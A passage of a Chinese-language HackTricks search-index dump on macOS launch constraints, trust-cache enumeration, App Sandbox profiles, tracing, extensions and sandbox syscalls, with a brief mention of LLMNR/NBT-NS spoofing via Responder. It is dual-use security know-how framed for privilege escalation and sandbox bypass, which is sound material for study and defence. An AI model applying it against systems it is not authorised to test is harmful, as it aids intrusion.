基本信息","id":"2575","title":"基本信息"},"2576":{"body":"LC 由 事实 和 逻辑操作 (与,或..)组成,结合事实。 LC 可以使用的事实已记录 。例如: is-init-proc:一个布尔值,指示可执行文件是否必须是操作系统的初始化进程(launchd)。 is-sip-protected:一个布尔值,指示可执行文件是否必须是受系统完整性保护(SIP)保护的文件。 on-authorized-authapfs-volume: 一个布尔值,指示操作系统是否从授权的、经过身份验证的 APFS 卷加载了可执行文件。 on-authorized-authapfs-volume:一个布尔值,指示操作系统是否从授权的、经过身份验证的 APFS 卷加载了可执行文件。 Cryptexes 卷 on-system-volume: 一个布尔值,指示操作系统是否从当前启动的系统卷加载了可执行文件。 在 /System 内... ... 
当 Apple 二进制文件被签名时,它会 将其分配到信任缓存 中的 LC 类别。 iOS 16 LC 类别 已在此处 反向工程并记录 。 当前的 **LC 类别(macOS 14 - Sonoma)**已被反向工程,其 描述可以在这里找到 。 例如,类别 1 是: Category 1:\\nSelf Constraint: (on-authorized-authapfs-volume || on-system-volume) && launch-type == 1 && validation-category == 1\\nParent Constraint: is-init-proc (on-authorized-authapfs-volume || on-system-volume):必须在系统或Cryptexes卷中。 launch-type == 1:必须是系统服务(LaunchDaemons中的plist)。 validation-category == 1:操作系统可执行文件。 is-init-proc:Launchd","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » LC 类别","id":"2576","title":"LC 类别"},"2577":{"body":"您可以在这里找到更多信息 关于它 ,但基本上,它们在 AMFI (AppleMobileFileIntegrity) 中定义,因此您需要下载内核开发工具包以获取 KEXT 。以 kConstraintCategory 开头的符号是 有趣 的。提取它们后,您将获得一个 DER (ASN.1) 编码流,您需要使用 ASN.1 解码器 或 python-asn1 库及其 dump.py 脚本 andrivet/python-asn1 进行解码,这将为您提供一个更易理解的字符串。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 反向工程 LC 类别","id":"2577","title":"反向工程 LC 类别"},"2578":{"body":"这些是配置在 第三方应用程序 中的启动约束。开发人员可以选择在其应用程序中使用的 事实 和 逻辑运算符 来限制对自身的访问。 可以使用以下方法枚举应用程序的环境约束: bash codesign -d -vvvv app.app","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 环境约束","id":"2578","title":"环境约束"},"2579":{"body":"在 macOS 中有几个信任缓存: /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4 /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4 /System/Library/Security/OSLaunchPolicyData 在 iOS 中,它看起来在 /usr/standalone/firmware/FUD/StaticTrustCache.img4 。 warning 在运行在 Apple Silicon 设备上的 macOS 上,如果 Apple 签名的二进制文件不在信任缓存中,AMFI 将拒绝加载它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 信任缓存","id":"2579","title":"信任缓存"},"258":{"body":"Reading time: 15 minutes tip 
学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks","id":"258","title":"Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks"},"2580":{"body":"之前的信任缓存文件格式为 IMG4 和 IM4P ,IM4P 是 IMG4 格式的有效载荷部分。 您可以使用 pyimg4 来提取数据库的有效载荷: bash # Installation\\npython3 -m pip install pyimg4 # Extract payloads data\\ncp /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/BaseSystemTrustCache.img4 /tmp\\npyimg4 img4 extract -i /tmp/BaseSystemTrustCache.img4 -p /tmp/BaseSystemTrustCache.im4p\\npyimg4 im4p extract -i /tmp/BaseSystemTrustCache.im4p -o /tmp/BaseSystemTrustCache.data cp /System/Volumes/Preboot/*/boot/*/usr/standalone/firmware/FUD/StaticTrustCache.img4 /tmp\\npyimg4 img4 extract -i /tmp/StaticTrustCache.img4 -p /tmp/StaticTrustCache.im4p\\npyimg4 im4p extract -i /tmp/StaticTrustCache.im4p -o /tmp/StaticTrustCache.data pyimg4 im4p extract -i /System/Library/Security/OSLaunchPolicyData -o /tmp/OSLaunchPolicyData.data (另一个选项是使用工具 img4tool ,即使发布版本较旧,它也可以在 M1 上运行,并且如果您将其安装在正确的位置,它也可以在 x86_64 上运行)。 现在您可以使用工具 trustcache 以可读格式获取信息: bash # Install\\nwget https://github.com/CRKatri/trustcache/releases/download/v2.0/trustcache_macos_arm64\\nsudo mv ./trustcache_macos_arm64 /usr/local/bin/trustcache\\nxattr -rc /usr/local/bin/trustcache\\nchmod +x /usr/local/bin/trustcache # Run\\ntrustcache info /tmp/OSLaunchPolicyData.data | head\\ntrustcache info /tmp/StaticTrustCache.data | head\\ntrustcache info /tmp/BaseSystemTrustCache.data | head version = 2\\nuuid = 35EB5284-FD1E-4A5A-9EFB-4F79402BA6C0\\nentry count = 
969\\n0065fc3204c9f0765049b82022e4aa5b44f3a9c8 [none] [2] [1]\\n00aab02b28f99a5da9b267910177c09a9bf488a2 [none] [2] [1]\\n0186a480beeee93050c6c4699520706729b63eff [none] [2] [2]\\n0191be4c08426793ff3658ee59138e70441fc98a [none] [2] [3]\\n01b57a71112235fc6241194058cea5c2c7be3eb1 [none] [2] [2]\\n01e6934cb8833314ea29640c3f633d740fc187f2 [none] [2] [2]\\n020bf8c388deaef2740d98223f3d2238b08bab56 [none] [2] [3] 信任缓存遵循以下结构,因此 LC 类别是第 4 列 c struct trust_cache_entry2 {\\nuint8_t cdhash[CS_CDHASH_LEN];\\nuint8_t hash_type;\\nuint8_t flags;\\nuint8_t constraintCategory;\\nuint8_t reserved0;\\n} __attribute__((__packed__)); 然后,您可以使用像 这个 这样的脚本来提取数据。 从这些数据中,您可以检查具有**启动约束值为0**的应用程序,这些应用程序没有受到约束( 在这里检查 每个值的含义)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 枚举信任缓存","id":"2580","title":"枚举信任缓存"},"2581":{"body":"启动约束将通过 确保进程不会在意外条件下执行 来缓解几种旧攻击:例如,从意外位置启动或被意外的父进程调用(如果只有launchd应该启动它)。 此外,启动约束还 缓解降级攻击 。 然而,它们 并不缓解常见的XPC 滥用、 Electron 代码注入或 dylib注入 ,而不进行库验证(除非可以加载库的团队ID是已知的)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 攻击缓解","id":"2581","title":"攻击缓解"},"2582":{"body":"在Sonoma版本中,一个显著的点是守护进程XPC服务的 责任配置 。XPC服务对自己负责,而不是连接的客户端负责。这在反馈报告FB13206884中有记录。这个设置可能看起来有缺陷,因为它允许与XPC服务进行某些交互: 启动XPC服务 :如果被认为是一个bug,这个设置不允许通过攻击者代码启动XPC服务。 连接到活动服务 :如果XPC服务已经在运行(可能由其原始应用程序激活),则没有连接到它的障碍。 虽然对XPC服务实施约束可能通过 缩小潜在攻击的窗口 而有益,但它并没有解决主要问题。确保XPC服务的安全性根本上需要 有效验证连接的客户端 。这仍然是加强服务安全性的唯一方法。此外,值得注意的是,提到的责任配置目前是有效的,这可能与预期设计不符。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » XPC守护进程保护","id":"2582","title":"XPC守护进程保护"},"2583":{"body":"即使要求应用程序必须 通过LaunchService打开 (在父约束中)。这可以通过使用**open (可以设置环境变量)或使用 Launch Services API**(可以指示环境变量)来实现。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & 
Trust Cache » Electron保护","id":"2583","title":"Electron保护"},"2584":{"body":"https://youtu.be/f1HA5QhLQ7Y?t=24146 https://theevilbit.github.io/posts/launch_constraints_deep_dive/ https://eclecticlight.co/2023/06/13/why-wont-a-system-app-or-command-tool-run-launch-constraints-and-trust-caches/ https://developer.apple.com/videos/play/wwdc2023/10266/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 参考文献","id":"2584","title":"参考文献"},"2585":{"body":"Reading time: 22 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » macOS Sandbox","id":"2585","title":"macOS Sandbox"},"2586":{"body":"MacOS Sandbox(最初称为 Seatbelt) 限制应用程序 在沙箱内运行时只能执行 沙箱配置文件中指定的允许操作 。这有助于确保 应用程序仅访问预期的资源 。 任何具有 权限 com.apple.security.app-sandbox 的应用程序都将在沙箱内执行。 Apple 二进制文件 通常在沙箱内执行,所有来自 App Store 的应用程序都有该权限。因此,多个应用程序将在沙箱内执行。 为了控制进程可以或不能做什么, 沙箱在几乎所有进程可能尝试的操作中都有钩子 (包括大多数系统调用),使用 MACF 。然而, 根据 应用程序的 权限 ,沙箱可能对进程更加宽松。 沙箱的一些重要组件包括: 内核扩展 /System/Library/Extensions/Sandbox.kext 私有框架 /System/Library/PrivateFrameworks/AppSandbox.framework 在用户空间运行的 守护进程 /usr/libexec/sandboxd 容器 ~/Library/Containers","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 基本信息","id":"2586","title":"基本信息"},"2587":{"body":"每个沙箱应用程序将在 ~/Library/Containers/{CFBundleIdentifier} 中拥有自己的容器: bash ls -l ~/Library/Containers\\ntotal 0\\ndrwx------@ 4 username staff 128 May 23 20:20 com.apple.AMPArtworkAgent\\ndrwx------@ 4 username staff 128 May 23 20:13 com.apple.AMPDeviceDiscoveryAgent\\ndrwx------@ 4 username staff 128 Mar 24 18:03 com.apple.AVConference.Diagnostic\\ndrwx------@ 4 username staff 128 Mar 25 14:14 com.apple.Accessibility-Settings.extension\\ndrwx------@ 4 username staff 128 Mar 25 14:10 com.apple.ActionKit.BundledIntentHandler\\n[...] 
在每个 bundle id 文件夹内,您可以找到应用的 plist 和 数据目录 ,其结构模仿主目录: bash cd /Users/username/Library/Containers/com.apple.Safari\\nls -la\\ntotal 104\\ndrwx------@ 4 username staff 128 Mar 24 18:08 .\\ndrwx------ 348 username staff 11136 May 23 20:57 ..\\n-rw-r--r-- 1 username staff 50214 Mar 24 18:08 .com.apple.containermanagerd.metadata.plist\\ndrwx------ 13 username staff 416 Mar 24 18:05 Data ls -l Data\\ntotal 0\\ndrwxr-xr-x@ 8 username staff 256 Mar 24 18:08 CloudKit\\nlrwxr-xr-x 1 username staff 19 Mar 24 18:02 Desktop -> ../../../../Desktop\\ndrwx------ 2 username staff 64 Mar 24 18:02 Documents\\nlrwxr-xr-x 1 username staff 21 Mar 24 18:02 Downloads -> ../../../../Downloads\\ndrwx------ 35 username staff 1120 Mar 24 18:08 Library\\nlrwxr-xr-x 1 username staff 18 Mar 24 18:02 Movies -> ../../../../Movies\\nlrwxr-xr-x 1 username staff 17 Mar 24 18:02 Music -> ../../../../Music\\nlrwxr-xr-x 1 username staff 20 Mar 24 18:02 Pictures -> ../../../../Pictures\\ndrwx------ 2 username staff 64 Mar 24 18:02 SystemData\\ndrwx------ 2 username staff 64 Mar 24 18:02 tmp caution 请注意,即使符号链接存在以“逃离”沙盒并访问其他文件夹,应用程序仍然需要 具有权限 才能访问它们。这些权限在RedirectablePaths中的**.plist**内。 **SandboxProfileData**是编译后的沙盒配置文件CFData,已转义为B64。 bash # Get container config\\n## You need FDA to access the file, not even just root can read it\\nplutil -convert xml1 .com.apple.containermanagerd.metadata.plist -o - # Binary sandbox profile\\nSandboxProfileData\\n\\nAAAhAboBAAAAAAgAAABZAO4B5AHjBMkEQAUPBSsGPwsgASABHgEgASABHwEf... # In this file you can find the entitlements:\\nEntitlements\\n\\ncom.apple.MobileAsset.PhishingImageClassifier2\\n\\ncom.apple.accounts.appleaccount.fullaccess\\n\\ncom.apple.appattest.spi\\n\\nkeychain-access-groups\\n\\n6N38VWS5BX.ru.keepcoder.Telegram\\n6N38VWS5BX.ru.keepcoder.TelegramShare\\n\\n[...] # Some parameters\\nParameters\\n\\n_HOME\\n/Users/username\\n_UID\\n501\\n_USER\\nusername\\n[...] 
# The paths it can access\\nRedirectablePaths\\n\\n/Users/username/Downloads\\n/Users/username/Documents\\n/Users/username/Library/Calendars\\n/Users/username/Desktop\\nRedirectedPaths\\n\\n[...] warning 由沙盒应用程序创建/修改的所有内容将获得 隔离属性 。如果沙盒应用程序尝试使用**open** 执行某些操作,这将通过触发 Gatekeeper 来阻止沙盒空间。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 容器","id":"2587","title":"容器"},"2588":{"body":"沙盒配置文件是指示在该 沙盒 中将被 允许/禁止 的内容的配置文件。它使用 沙盒配置文件语言 (SBPL) ,该语言使用 Scheme 编程语言。 这里可以找到一个示例: scheme (version 1) ; First you get the version (deny default) ; Then you shuold indicate the default action when no rule applies (allow network*) ; You can use wildcards and allow everything (allow file-read* ; You can specify where to apply the rule\\n(subpath \\"/Users/username/\\")\\n(literal \\"/tmp/afile\\")\\n(regex #\\"^/private/etc/.*\\")\\n) (allow mach-lookup\\n(global-name \\"com.apple.analyticsd\\")\\n) tip 查看这个 研究 以检查更多可能被允许或拒绝的操作。 请注意,在配置文件的编译版本中,操作的名称被其在一个数组中的条目所替代,该数组为dylib和kext所知,使得编译版本更短且更难阅读。 重要的 系统服务 也在其自定义 沙箱 内运行,例如 mdnsresponder 服务。您可以在以下位置查看这些自定义 沙箱配置文件 : /usr/share/sandbox /System/Library/Sandbox/Profiles 其他沙箱配置文件可以在 https://github.com/s7ephen/OSX-Sandbox--Seatbelt--Profiles 中查看。 App Store 应用使用 配置文件 /System/Library/Sandbox/Profiles/application.sb 。您可以在此配置文件中检查诸如 com.apple.security.network.server 的权限如何允许进程使用网络。 然后,一些 Apple 守护进程服务 使用位于 /System/Library/Sandbox/Profiles/*.sb 或 /usr/share/sandbox/*.sb 的不同配置文件。这些沙箱在调用 API sandbox_init_XXX 的主函数中应用。 SIP 是一个名为 platform_profile 的沙箱配置文件,位于 /System/Library/Sandbox/rootless.conf。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙盒配置文件","id":"2588","title":"沙盒配置文件"},"2589":{"body":"要使用 特定沙箱配置文件 启动应用程序,您可以使用: bash sandbox-exec -f example.sb /Path/To/The/Application touch touch.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/tmp/hacktricks.txt\\")) bash # This will fail because default is denied, so it cannot execute 
touch\\nsandbox-exec -f touch.sb touch /tmp/hacktricks.txt\\n# Check logs\\nlog show --style syslog --predicate \'eventMessage contains[c] \\"sandbox\\"\' --last 30s\\n[...]\\n2023-05-26 13:42:44.136082+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) process-exec* /usr/bin/touch\\n2023-05-26 13:42:44.136100+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /usr/bin/touch\\n2023-05-26 13:42:44.136321+0200 localhost kernel[0]: (Sandbox) Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /var\\n2023-05-26 13:42:52.701382+0200 localhost kernel[0]: (Sandbox) 5 duplicate reports for Sandbox: sandbox-exec(41398) deny(1) file-read-metadata /var\\n[...] touch2.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/tmp/hacktricks.txt\\"))\\n(allow process* (literal \\"/usr/bin/touch\\"))\\n; This will also fail because:\\n; 2023-05-26 13:44:59.840002+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-metadata /usr/bin/touch\\n; 2023-05-26 13:44:59.840016+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /usr/bin/touch\\n; 2023-05-26 13:44:59.840028+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data /usr/bin\\n; 2023-05-26 13:44:59.840034+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-metadata /usr/lib/dyld\\n; 2023-05-26 13:44:59.840050+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) sysctl-read kern.bootargs\\n; 2023-05-26 13:44:59.840061+0200 localhost kernel[0]: (Sandbox) Sandbox: touch(41575) deny(1) file-read-data / touch3.sb (version 1)\\n(deny default)\\n(allow file* (literal \\"/private/tmp/hacktricks.txt\\"))\\n(allow process* (literal \\"/usr/bin/touch\\"))\\n(allow file-read-data (literal \\"/\\"))\\n; This one will work tip 请注意, Apple 编写的 软件 在 Windows 上 没有额外的安全措施 ,例如应用程序沙箱。 绕过示例: https://lapcatsoftware.com/articles/sandbox-escape.html 
https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c (他们能够写入以 ~$ 开头的沙箱外文件)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱配置文件示例","id":"2589","title":"沙箱配置文件示例"},"259":{"body":"","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 网络协议","id":"259","title":"网络协议"},"2590":{"body":"通过配置文件 可以跟踪沙箱每次检查操作时执行的所有检查。为此,只需创建以下配置文件: trace.sb (version 1)\\n(trace /tmp/trace.out) 然后只需使用该配置文件执行某些操作: bash sandbox-exec -f /tmp/trace.sb /bin/ls 在 /tmp/trace.out 中,您将能够看到每次调用时执行的每个沙箱检查(因此,有很多重复项)。 还可以使用 -t 参数跟踪沙箱:sandbox-exec -t /path/trace.out -p \\"(version 1)\\" /bin/ls 通过 API libsystem_sandbox.dylib 导出的函数 sandbox_set_trace_path 允许指定一个跟踪文件名,沙箱检查将写入该文件。 还可以通过调用 sandbox_vtrace_enable() 来做类似的事情,然后通过调用 sandbox_vtrace_report() 从缓冲区获取日志错误。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱跟踪","id":"2590","title":"沙箱跟踪"},"2591":{"body":"libsandbox.dylib 导出一个名为 sandbox_inspect_pid 的函数,该函数提供进程的沙箱状态列表(包括扩展)。但是,只有平台二进制文件可以使用此函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱检查","id":"2591","title":"沙箱检查"},"2592":{"body":"MacOS 将系统沙箱配置文件存储在两个位置: /usr/share/sandbox/ 和 /System/Library/Sandbox/Profiles 。 如果第三方应用程序携带 com.apple.security.app-sandbox 权限,则系统将 /System/Library/Sandbox/Profiles/application.sb 配置文件应用于该进程。 在 iOS 中,默认配置文件称为 container ,我们没有 SBPL 文本表示。在内存中,这个沙箱被表示为每个权限的允许/拒绝二叉树。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » MacOS 和 iOS 沙箱配置文件","id":"2592","title":"MacOS 和 iOS 沙箱配置文件"},"2593":{"body":"公司可能会使其应用程序 使用自定义沙箱配置文件 (而不是默认配置文件)。他们需要使用权限 com.apple.security.temporary-exception.sbpl ,该权限需要得到 Apple 的授权。 可以在 /System/Library/Sandbox/Profiles/application.sb: 中检查此权限的定义。 scheme (sandbox-array-entitlement\\n\\"com.apple.security.temporary-exception.sbpl\\"\\n(lambda (string)\\n(let* ((port (open-input-string 
string)) (sbpl (read port)))\\n(with-transparent-redirection (eval sbpl))))) 这将 在此权限之后评估字符串 作为沙箱配置文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » App Store 应用中的自定义 SBPL","id":"2593","title":"App Store 应用中的自定义 SBPL"},"2594":{"body":"sandbox-exec 工具使用 libsandbox.dylib 中的 sandbox_compile_* 函数。导出的主要函数有:sandbox_compile_file(期望文件路径,参数 -f),sandbox_compile_string(期望字符串,参数 -p),sandbox_compile_name(期望容器名称,参数 -n),sandbox_compile_entitlements(期望权限 plist)。 这个反向和 开源版本的工具 sandbox-exec 允许 sandbox-exec 将编译的沙箱配置文件写入文件中。 此外,为了将进程限制在容器内,它可能会调用 sandbox_spawnattrs_set[container/profilename] 并传递一个容器或现有配置文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 编译和反编译沙箱配置文件","id":"2594","title":"编译和反编译沙箱配置文件"},"2595":{"body":"在 macOS 上,与 iOS 不同,iOS 中的进程从一开始就被内核沙箱化, 进程必须自己选择进入沙箱 。这意味着在 macOS 上,进程在主动决定进入沙箱之前不会受到沙箱的限制,尽管 App Store 应用始终是沙箱化的。 如果进程具有权限:com.apple.security.app-sandbox,则在启动时会自动从用户空间沙箱化。有关此过程的详细说明,请查看: macOS Sandbox Debug & Bypass","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 调试和绕过沙箱","id":"2595","title":"调试和绕过沙箱"},"2596":{"body":"扩展允许为对象提供进一步的权限,并通过调用以下函数之一来实现: sandbox_issue_extension sandbox_extension_issue_file[_with_new_type] sandbox_extension_issue_mach sandbox_extension_issue_iokit_user_client_class sandbox_extension_issue_iokit_registry_rentry_class sandbox_extension_issue_generic sandbox_extension_issue_posix_ipc 扩展存储在可从进程凭据访问的第二个 MACF 标签槽中。以下 sbtool 可以访问此信息。 请注意,扩展通常由允许的进程授予,例如,当进程尝试访问照片并在 XPC 消息中被允许时,tccd 将授予 com.apple.tcc.kTCCServicePhotos 的扩展令牌。然后,进程需要消耗扩展令牌,以便将其添加到其中。 请注意,扩展令牌是长十六进制数,编码了授予的权限。然而,它们没有硬编码的允许 PID,这意味着任何可以访问令牌的进程可能会被 多个进程消耗 。 请注意,扩展与权限密切相关,因此拥有某些权限可能会自动授予某些扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 沙箱扩展","id":"2596","title":"沙箱扩展"},"2597":{"body":"根据这个 , sandbox_check 函数(它是一个 __mac_syscall)可以检查 在特定 PID、审计令牌或唯一 ID 下某个操作是否被沙箱允许 。 工具 sbtool 
(在 这里编译 )可以检查某个 PID 是否可以执行某些操作: bash sbtool mach #Check mac-ports (got from launchd with an api)\\nsbtool file /tmp #Check file access\\nsbtool inspect #Gives you an explanation of the sandbox profile and extensions\\nsbtool all","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » 检查 PID 权限","id":"2597","title":"检查 PID 权限"},"2598":{"body":"也可以使用 libsystem_sandbox.dylib 中的 sandbox_suspend 和 sandbox_unsuspend 函数来暂停和恢复沙箱。 请注意,调用暂停函数时会检查一些权限,以授权调用者调用它,例如: com.apple.private.security.sandbox-manager com.apple.security.print com.apple.security.temporary-exception.audio-unit-host","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » [un]suspend","id":"2598","title":"[un]suspend"},"2599":{"body":"此系统调用 (#381) 期望第一个参数为一个字符串,指示要运行的模块,然后第二个参数为一个代码,指示要运行的函数。第三个参数将取决于执行的函数。 函数 ___sandbox_ms 调用包装了 mac_syscall,在第一个参数中指示 \\"Sandbox\\",就像 ___sandbox_msp 是 mac_set_proc (#387) 的包装器一样。然后,___sandbox_ms 支持的一些代码可以在此表中找到: set_profile (#0) : 将编译或命名的配置文件应用于进程。 platform_policy (#1) : 强制执行特定于平台的策略检查(在 macOS 和 iOS 之间有所不同)。 check_sandbox (#2) : 执行特定沙箱操作的手动检查。 note (#3) : 向沙箱添加注释。 container (#4) : 向沙箱附加注释,通常用于调试或识别。 extension_issue (#5) : 为进程生成新扩展。 extension_consume (#6) : 消耗给定的扩展。 extension_release (#7) : 释放与已消耗扩展相关的内存。 extension_update_file (#8) : 修改沙箱内现有文件扩展的参数。 extension_twiddle (#9) : 调整或修改现有文件扩展(例如,TextEdit、rtf、rtfd)。 suspend (#10) : 暂时暂停所有沙箱检查(需要适当的权限)。 unsuspend (#11) : 恢复所有先前暂停的沙箱检查。 passthrough_access (#12) : 允许直接通过访问资源,绕过沙箱检查。 set_container_path (#13) : (仅限 iOS)为应用组或签名 ID 设置容器路径。 container_map (#14) : (仅限 iOS)从 containermanagerd 检索容器路径。 sandbox_user_state_item_buffer_send (#15) : (iOS 10+)在沙箱中设置用户模式元数据。 inspect (#16) : 提供有关沙箱进程的调试信息。 dump (#18) : (macOS 11)转储沙箱的当前配置文件以供分析。 vtrace (#19) : 跟踪沙箱操作以进行监控或调试。 builtin_profile_deactivate (#20) : (macOS < 11)停用命名配置文件(例如,pe_i_can_has_debugger)。 check_bulk (#21) : 在一次调用中执行多个 sandbox_check 操作。 reference_retain_by_audit_token (#28) : 为审计令牌创建引用,以便在沙箱检查中使用。 
reference_release (#29) : 释放先前保留的审计令牌引用。 rootless_allows_task_for_pid (#30) : 验证是否允许 task_for_pid(类似于 csr 检查)。 rootless_whitelist_push (#31) : (macOS)应用系统完整性保护(SIP)清单文件。 rootless_whitelist_check (preflight) (#32) : 在执行之前检查 SIP 清单文件。 rootless_protected_volume (#33) : (macOS)对磁盘或分区应用 SIP 保护。 rootless_mkdir_protected (#34) : 对目录创建过程应用 SIP/DataVault 保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » mac_syscall","id":"2599","title":"mac_syscall"},"26":{"body":"你是否对想要攻击的机器有 物理访问 ?你应该阅读一些关于 物理攻击的技巧 和其他关于 从GUI应用程序逃脱 的内容。","breadcrumbs":"Pentesting Methodology » 0- 物理攻击","id":"26","title":"0- 物理攻击"},"260":{"body":"LLMNR, NBT-NS 和 mDNS : 微软和其他操作系统在 DNS 失败时使用 LLMNR 和 NBT-NS 进行本地名称解析。类似地,苹果和 Linux 系统使用 mDNS。 由于这些协议在 UDP 上的未认证广播特性,它们容易受到拦截和欺骗。 Responder 可用于通过向查询这些协议的主机发送伪造响应来冒充服务。 有关使用 Responder 进行服务冒充的更多信息,请参见 这里 。","breadcrumbs":"Pentesting Network » Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks » 本地主机解析协议","id":"260","title":"本地主机解析协议"},"2600":{"body":"请注意,在 iOS 中,内核扩展包含 硬编码的所有配置文件 ,以避免被修改。以下是内核扩展中的一些有趣函数: hook_policy_init : 它钩住 mpo_policy_init,并在 mac_policy_register 之后调用。它执行沙箱的大部分初始化。它还初始化 SIP。 hook_policy_initbsd : 它设置 sysctl 接口,注册 security.mac.sandbox.sentinel、security.mac.sandbox.audio_active 和 security.mac.sandbox.debug_mode(如果以 PE_i_can_has_debugger 启动)。 hook_policy_syscall : 它由 mac_syscall 调用,第一个参数为 \\"Sandbox\\",第二个参数为指示操作的代码。使用 switch 来根据请求的代码查找要运行的代码。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Sandbox » Sandbox.kext","id":"2600","title":"Sandbox.kext"},"2601":{"body":"Sandbox.kext 通过 MACF 使用了超过一百个钩子。大多数钩子只会检查一些微不足道的情况,如果允许执行该操作,则会调用 cred_sb_evalutate ,并传入来自 MACF 的 凭据 和一个对应于要执行的 操作 的数字,以及一个用于输出的 缓冲区 。 一个很好的例子是函数 _mpo_file_check_mmap ,它钩住了 mmap ,并将开始检查新内存是否可写(如果不可写则允许执行),然后检查它是否用于 dyld 共享缓存,如果是,则允许执行,最后调用 sb_evaluate_internal (或其包装器之一)以执行进一步的允许检查。 此外,在沙箱使用的数百个钩子中,有三个特别有趣: mpo_proc_check_for: 如果需要并且之前未应用,则应用配置文件。 mpo_vnode_check_exec: 
